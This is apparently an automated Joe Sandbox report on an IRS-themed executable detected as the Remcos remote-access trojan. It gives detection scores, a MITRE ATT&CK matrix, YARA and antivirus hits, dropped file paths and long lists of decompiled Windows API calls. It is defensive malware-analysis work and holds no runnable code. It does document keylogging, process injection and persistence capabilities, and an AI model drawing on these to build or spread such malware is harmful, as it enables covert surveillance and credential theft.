Analysis Report irs Doc Attached.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 222924
Start date: 16.04.2020
Start time: 03:15:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 13s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: irs Doc Attached.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@28/7@5/2
EGA Information:
  • Successful, ratio: 57.1%
HDC Information:
  • Successful, ratio: 69% (good quality ratio 53.9%)
  • Quality average: 61.8%
  • Quality standard deviation: 40.2%
HCA Information:
  • Successful, ratio: 88%
  • Number of executed functions: 74
  • Number of non-executed functions: 309
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Excluded IPs from analysis (whitelisted): 216.58.215.238, 2.18.68.82, 93.184.221.240
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, drive.google.com, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Execution Graph export aborted for target Kaphpos.exe, PID 1824 because there are no executed functions
  • Execution Graph export aborted for target Kaphpos.exe, PID 5196 because there are no executed functions
  • Execution Graph export aborted for target irs Doc Attached.exe, PID 5488 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy  | Score | Range   | Reporting | Whitelisted | Threat | Detection
----------|-------|---------|-----------|-------------|--------|----------
Threshold | 100   | 0 - 100 |           | false       | Remcos | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
----------|-------|-------|----------------------------|-----------
Threshold | 5     | 0 - 5 | false                      |


Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Digits following a technique name are the report's signature-count badges.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
---|---|---|---|---|---|---|---|---|---|---|---|---|---
Valid Accounts | Scripting 12 | Registry Run Keys / Startup Folder 11 | Access Token Manipulation 1 | Software Packing 1 | Credential Dumping 1 | System Time Discovery 1 | Remote File Copy 21 | Screen Capture 1 | Data Encrypted 1 | Uncommonly Used Port 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Replication Through Removable Media | Execution through API 2 | Scheduled Task 1 | Process Injection 522 | Deobfuscate/Decode Files or Information 1 | Credentials in Files 2 | Account Discovery 1 | Remote Services | Input Capture 211 | Exfiltration Over Other Network Medium | Remote File Copy 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Defacement 1
External Remote Services | Graphical User Interface 11 | Modify Existing Service 1 | Scheduled Task 1 | Scripting 12 | Input Capture 211 | Security Software Discovery 11 | Windows Remote Management | Clipboard Data 2 | Automated Exfiltration | Standard Cryptographic Protocol 12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Command-Line Interface 11 | Application Shimming 1 | Application Shimming 1 | Obfuscated Files or Information 2 | Credentials in Files | System Service Discovery 1 | Logon Scripts | Input Capture | Data Encrypted | Remote Access Tools 1 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Service Execution 2 | New Service 1 | New Service 1 | Masquerading 111 | Account Manipulation | File and Directory Discovery 3 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Non-Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Scheduled Task 1 | Modify Existing Service | New Service | Modify Registry 1 | Brute Force | System Information Discovery 35 | Third-party Software | Screen Capture | Data Transfer Size Limits | Standard Application Layer Protocol 2 | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Virtualization/Sandbox Evasion 1 | Two-Factor Authentication Interception | Virtualization/Sandbox Evasion 1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Access Token Manipulation 1 | Bash History | Process Discovery 2 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection 522 | Input Prompt | Application Window Discovery 1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Scripting | Keychain | System Owner/User Discovery 1 | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | | | Data Encrypted for Impact
Hardware Additions | Execution through API | File System Permissions Weakness | Valid Accounts | Indicator Removal from Tools | Private Keys | Remote System Discovery 1 | Replication Through Removable Media | Video Capture | Standard Application Layer Protocol | Communication Through Removable Media | | | Disk Structure Wipe

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Kaphkos.exe; Virustotal: Detection: 9%
Source: C:\Users\Public\Kaphpos.exe; Virustotal: Detection: 12%
Source: C:\Users\Public\Kaphpos.exe; ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: irs Doc Attached.exe; Virustotal: Detection: 12%
Source: irs Doc Attached.exe; ReversingLabs: Detection: 28%
Yara detected Remcos RAT
Source: Yara match; File source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: ieinstal.exe PID: 3740, type: MEMORY
Source: Yara match; File source: Process Memory Space: ieinstal.exe PID: 660, type: MEMORY
Source: Yara match; File source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 16.2.ieinstal.exe.180000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 16.2.ieinstal.exe.10530000.2.unpack; Avira: Label: TR/Crypt.Morphine.Gen
Source: 2.2.ieinstal.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 2.2.ieinstal.exe.10530000.2.unpack; Avira: Label: TR/Crypt.Morphine.Gen

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@s
td@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE
PBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_tr
aits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$bas
ic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_105360A8 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,2_2_105360A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_10534D75 FindFirstFileW,2_2_10534D75
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_10544133 FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,2_2_10544133
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_10536534 FindFirstFileW,FindNextFileW,FindClose,2_2_10536534
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_10538E6F getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,2_2_10538E6F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 2_2_10541F40 FindFirstFileW,2_2_10541F40
